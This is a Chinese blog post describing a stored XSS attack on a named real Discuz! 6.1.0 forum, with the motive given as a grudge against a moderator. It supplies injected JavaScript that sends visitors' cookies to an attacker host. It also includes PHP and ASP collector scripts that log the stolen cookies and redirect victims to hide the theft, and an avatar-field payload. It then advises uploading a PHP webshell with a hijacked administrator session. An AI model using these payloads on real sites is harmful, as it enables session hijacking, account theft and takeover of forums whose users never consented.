网上关于XSS入侵网站的例子很多,但是大多都是一些恶作剧性质的介绍.下面本人来亲自介绍下利用脚本入侵国内某安全论坛的过程

  就像主题所说一样,今天测试的论坛是DISCUZ! 6.1.0

  目标:卡巴技术论坛 http://kpchina.net http://bbs.kpchina.net

  工具:无(感觉本人的入侵方式不是很高级,低调,所以不用工具,需要的东西自己写,都是脚本哦~!o(∩_∩)o...)

  下面开始入侵:

  XSS(Cross Site Scripting)攻击,想要获得权限就要找漏洞,大家都是知道,DISCUZ! 6.1.0 论坛有XSS漏洞,这是前人的经验,我不邀功

  很多人只是知道有XSS漏洞可以加个alert之类的标记,但是都属于恶作剧的范畴,实用战术才是抓住入侵的关键,让那些大意的编程人员和系统管理员能够提高安全意识。真正具有威胁性的XSS攻击方式就是那就是网上提到的窃取Cookie,Cookie是保存在本机临时目录,记录本机帐户登录网站的帐户信息,窃取它,并不能看到被窃取人的帐号和密码,有人会问,那有什么用,我们要的只是Cookie文件,只要把具有相应网站权限帐号的Cookie拷贝到入侵者自己机器的临时目录下,覆盖刷新那个网站,就能自动登录进去,获得其站点权限。

  上面说的是思路,下面说下如何活动卡巴论坛的管理权限

  要获得卡巴技术论坛的管理员帐号的Cookie,就要在论坛里注入获得帐号Cookie的js脚本,将Cookie以post方式提交给入侵者

  如图:

  论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽)

  论坛插入脚本:

  各位应该知道网上比较有名的 鬼仔blog 他用的是

var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);

  但是我不一样,因为他需要诱导人去点击他的链接,但是现在人不是傻子,不会轻易点你的链接。而我是要把脚步插入论坛页面中,这样既隐蔽又省去了诱导的力气

  我插入的脚本如下:

******************************************************************************
<script language="JavaS<wbr>cript"&gt; window.location.href="http://www.****.cn/upload_files/reg.php?var"+document.cookie; &lt;/script&gt; <br>******************************************************************************</wbr>

  跨站攻击脚本:

  reg.php

***********************************************************************
<?php
if (isset($_GET['var'])) {
    file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));
}
?>

<script language="JavaS<wbr>cript"&gt; window.location.href="http://www.ccXv.com"; &lt;/script&gt; //转移页面隐蔽上面记录cookie的操作<br><br>***********************************************************************</wbr>

  剩下的步骤就是等着鱼自己上钩了

  当管理员帐号点入论坛某个页面时,这个页面却被转到了某新闻网站,其实不知,他的cookie已经被记录

  拿这个cookie登录论坛,(删东西不推荐哦~~),可以临时开启上传php文件,例如phpwebshell,然后再关闭,这样你就可以很轻松的操控整个论坛站点

  为什么选择此论坛做入侵讲解,很简单,这个论坛具备了多个漏洞:

  一、论坛有XSS漏洞,没有对输入输出做过滤

  二、论坛采用cookie方式记录用户信息

  三、对论坛上某个版主看不惯,有点权利乱封号,不过,毕竟论坛不是那个人的,还是对管理员手下留情吧(做人要厚道!)

/

以下是获取cookie的php源代码:

<?php 
$info = getenv("QUERY_STRING"); 
if ($info) { 
$fp = fopen("test.txt","a"); 
fwrite($fp,$info."\n"); 
fclose($fp); 

?>

<script language=vbscript> 
document.location="http://my.51.net/bbs/" 
</script>

如果得到cookie,则在空间中生成test.txt,为了不引起怀疑,将自动把网页转换到http://xiaomutou.51.net/bbs/,把它上传到支持php的空间上。比如这里我把它传到 http://my.51.net/info2.php 然后注册一个用户(强烈建议大家注册英文用户,如baobaoguai) 我们在“关于自定义头像”中插入如下代码: 
java script:window.open('http://my.51.net/info2.php?'+document.cookie);

然后提交,现在这个的头像已经成了一段偷cookie的特殊代码。现在回到首页,看看在线成员列表,点我们刚才注册的用户,看,它弹出了两个窗口,一个是关于baobaoguai这个用户的资料,另一个则是http://my.51.net/bbs/

获取cookie的asp源代码:

<% 
testfile=Server.MapPath("cookies.txt") 
msg=Request("msg") 
set fs=server.CreateObject("scripting.filesystemobject") 
set thisfile=fs.OpenTextFile(testfile,8,True,0) 
thisfile.WriteLine(""&msg& "") 
thisfile.close 
set fs = nothing 
%>

渗透之cookie截取相关推荐

  1. (渗透-摘录) cookie 注入

    2019年2月11日  (渗透--摘录1) cookie注入 抛开中转工具直接搞定Cookie注入 最近在翻看危险漫步博客的时候,拜读了一篇关于Cookie注入的文章,受益良多.文中详细解析了Cook ...

  2. CGI脚本跨站截取Cookie/附ASP的版本

    XSS,现在都成热门词了,跨来跨去都是alert,无聊~~     其实alert()不能排除是一种检测方式,很实用,呵呵.跨站跨到Cookies才是正道,如果网站系统有Cookie欺骗漏洞的话那就非 ...

  3. 渗透测试之XSS(跨站脚本攻击)

    文章目录 XSS 漏洞概述 XSS 分类 XSS 危害 XSS 漏洞的验证 XSS 的构造 XSS 的变形(绕过方式) Shellcode 的调用 远程调用JS windows.location.ha ...

  4. 渗透工具-Burpsuite

    渗透测试-Burpsuite 中文乱码 "有软件正在阻止Firefox安全连接至网站" 第三节 BurpSuite相关 注意:Burp Suite Pro 2020.8版本需要 J ...

  5. 前端cookie的设置获取删除

    前端cookie的设置获取删除 /* 我们有过这样的经历,当我们登录一个网站时候,网站会提示我们需不需要记住账号和密码一般来说,当我们登录一个网站时,后台会返回一个token字符串作为用户的登录标识, ...

  6. 前端面试----深信服面试题全概

    这里结合了CSDN多位博主和自己当时被问到的的深信服面试题,为了锻炼自己的答题能力和技术点理解,这里对博主的各个题目进行了自己的解答(最好用自己的理解自己的话解答),部分解答借鉴了博主的回答,同时对部 ...

  7. 渗透新手福利---xss到获取cookie入门级

    CV 新手写第一次写不足还请大佬多多指教,图片上传太麻烦了有的图片上传的位置估计不对,还请大家多多海量 通过对Tips的读取我们明白了这题是一道存储型XSS偷取cookie的题目.(因为flag在co ...

  8. 【渗透测试】cookie注入笔记

    目录 什么是cookie? 什么是cookie注入? Cookie手注流程 一.判断注入点 二.判断字段数 三.判断回显点 四.查询相关内容 补充 答疑 1.为什么是select 1,2 不是 sel ...

  9. 【网络安全学习】渗透测试篇02-数据截取教程(上)

    抓包(packet capture)意指将发送与接收的数据包进行截获.重发.编辑.转存等操作 目录 为什么要学习原理? 使用BurpSuite进行抓包之应用程序的选取与安装 为什么要学习原理? 通过上 ...

最新文章

  1. HarmonyOS Image 属性了解
  2. 一台服务器上起2个mysql服务
  3. 【iOS-cocos2d-X 游戏开发之十三】cocos2dx通过Jni调用Android的Java层代码(下)
  4. linux c++ 调用matlab,ubuntu系统下C++调用matlab程序的方法详解
  5. 又一个神器!只需一行代码,纯文本秒变Markdown
  6. LL-verilog-HDLBitSim/circuit10解答和过程详解
  7. iOS 键盘风格详解UIKeyboardType
  8. pix2pix笔记(B站,更加清晰)
  9. BigDecimal 工具类
  10. 产品总监基本功:从零到壹
  11. Linux 编译 python3.7
  12. cdr软件百度百科_cdr是什么软件?
  13. 解放生产力,CSS3帧动画工具
  14. 微生物群也有记忆 | 微生物群能被“训练”
  15. 设计一个person类java_定义一个Person类,含姓名、性别、年龄等字段;继承Person类设计...
  16. 2016年开源巨献:百度71款开源项目
  17. python字典读取特定值_python 获取字典特定值对应的键的实现
  18. Spring框架及其特点
  19. 更好用的HTTP客户端工具,跟SpringBoot绝配
  20. python剪刀石头布程序_使用Python Tkinter实现剪刀石头布小游戏功能

热门文章

  1. 信息学奥赛一本通(1254:走出迷宫)
  2. So Easy!(HDU - 4565)
  3. 信息学奥赛一本通C++语言——1093:计算多项式的值
  4. 8 MM配置-主数据-定义行业部门和具体行业部门字段选择
  5. 28 CO配置-控制-产品成本控制-成本对象控制-期末结算-定义行标识
  6. mysql语法中的join_MySQL JOIN 语法说明与 图解
  7. .net runtime占用cpu_Go服务在容器内CPU使用率异常问题排查手记
  8. uds帧格式_UDS诊断帧
  9. python语言程序设计试卷西京学院_Python语言程序设计A-中国大学mooc-试题题目及答案...
  10. 合并数组内的对象的数字